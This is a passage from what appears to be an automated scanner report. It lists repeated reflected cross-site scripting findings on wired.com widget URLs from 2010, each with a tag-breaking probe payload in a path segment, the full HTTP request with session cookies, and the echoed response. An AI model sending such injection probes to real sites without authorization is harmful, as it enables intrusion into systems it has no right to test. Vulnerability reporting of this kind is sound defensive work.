Path:   /ajax/widgets/related/content/blogPost/magazine_39648

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c6a5"><a>1a9008494ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related6c6a5"><a>1a9008494ce/content/blogPost/magazine_39648 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29390
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:13 GMT
Date: Mon, 22 Nov 2010 01:11:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related6c6a5"><a>1a9008494ce">
...[SNIP]...

1.13. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/playbook_3021

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc70a"><a>3b04f1e36da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxfc70a"><a>3b04f1e36da/widgets/related/content/blogPost/playbook_3021 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:34 GMT
Date: Mon, 22 Nov 2010 01:10:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxfc70a"><a>3b04f1e36da ss_widgets c_related">
...[SNIP]...

1.14. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/playbook_3021

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d30b"><a>fc5601b0c19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets5d30b"><a>fc5601b0c19/related/content/blogPost/playbook_3021 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Mon, 22 Nov 2010 01:14:53 GMT
Date: Mon, 22 Nov 2010 01:10:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets5d30b"><a>fc5601b0c19 c_related">
...[SNIP]...

1.15. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/playbook_3021

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f817"><a>9b3c8b9b37f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related4f817"><a>9b3c8b9b37f/content/blogPost/playbook_3021 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:15:01 GMT
Date: Mon, 22 Nov 2010 01:11:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related4f817"><a>9b3c8b9b37f">
...[SNIP]...

1.16. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/reviews_25843

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c31"><a>f807e40c9a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxb3c31"><a>f807e40c9a9/widgets/related/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:23 GMT
Date: Mon, 22 Nov 2010 01:10:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxb3c31"><a>f807e40c9a9 ss_widgets c_related">
...[SNIP]...

1.17. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/reviews_25843

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310b1"><a>8982e2d5c82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets310b1"><a>8982e2d5c82/related/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:51 GMT
Date: Mon, 22 Nov 2010 01:10:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets310b1"><a>8982e2d5c82 c_related">
...[SNIP]...

1.18. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/reviews_25843

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2273e"><a>e3e8aa7828e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related2273e"><a>e3e8aa7828e/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:10 GMT
Date: Mon, 22 Nov 2010 01:11:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related2273e"><a>e3e8aa7828e">
...[SNIP]...

1.19. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20877

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10a5"><a>295271ef989 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxe10a5"><a>295271ef989/widgets/related/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:25 GMT
Date: Mon, 22 Nov 2010 01:10:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxe10a5"><a>295271ef989 ss_widgets c_related">
...[SNIP]...

1.20. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20877

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dffe"><a>cc5a2c835a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets9dffe"><a>cc5a2c835a1/related/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets9dffe"><a>cc5a2c835a1 c_related">
...[SNIP]...

1.21. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20877

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e38f1"><a>6244b533a3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatede38f1"><a>6244b533a3a/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=234
Expires: Mon, 22 Nov 2010 01:15:02 GMT
Date: Mon, 22 Nov 2010 01:11:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatede38f1"><a>6244b533a3a">
...[SNIP]...

1.22. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20913

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ec0"><a>87032be8af7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax83ec0"><a>87032be8af7/widgets/related/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=230
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax83ec0"><a>87032be8af7 ss_widgets c_related">
...[SNIP]...

1.23. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20913

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfa0d"><a>6a79b0a2118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgetsdfa0d"><a>6a79b0a2118/related/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:14:31 GMT
Date: Mon, 22 Nov 2010 01:10:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgetsdfa0d"><a>6a79b0a2118 c_related">
...[SNIP]...

1.24. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_20913

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced2f"><a>d31ee7a0ba1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedced2f"><a>d31ee7a0ba1/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:08 GMT
Date: Mon, 22 Nov 2010 01:11:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedced2f"><a>d31ee7a0ba1">
...[SNIP]...

1.25. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_7588

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb42"><a>82cb0a5692c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxabb42"><a>82cb0a5692c/widgets/related/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=237
Expires: Mon, 22 Nov 2010 01:14:27 GMT
Date: Mon, 22 Nov 2010 01:10:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxabb42"><a>82cb0a5692c ss_widgets c_related">
...[SNIP]...

1.26. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_7588

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b1b"><a>6f0f8c7e998 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets97b1b"><a>6f0f8c7e998/related/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:14:41 GMT
Date: Mon, 22 Nov 2010 01:10:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets97b1b"><a>6f0f8c7e998 c_related">
...[SNIP]...

1.27. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_7588

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f606f"><a>222e926617f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

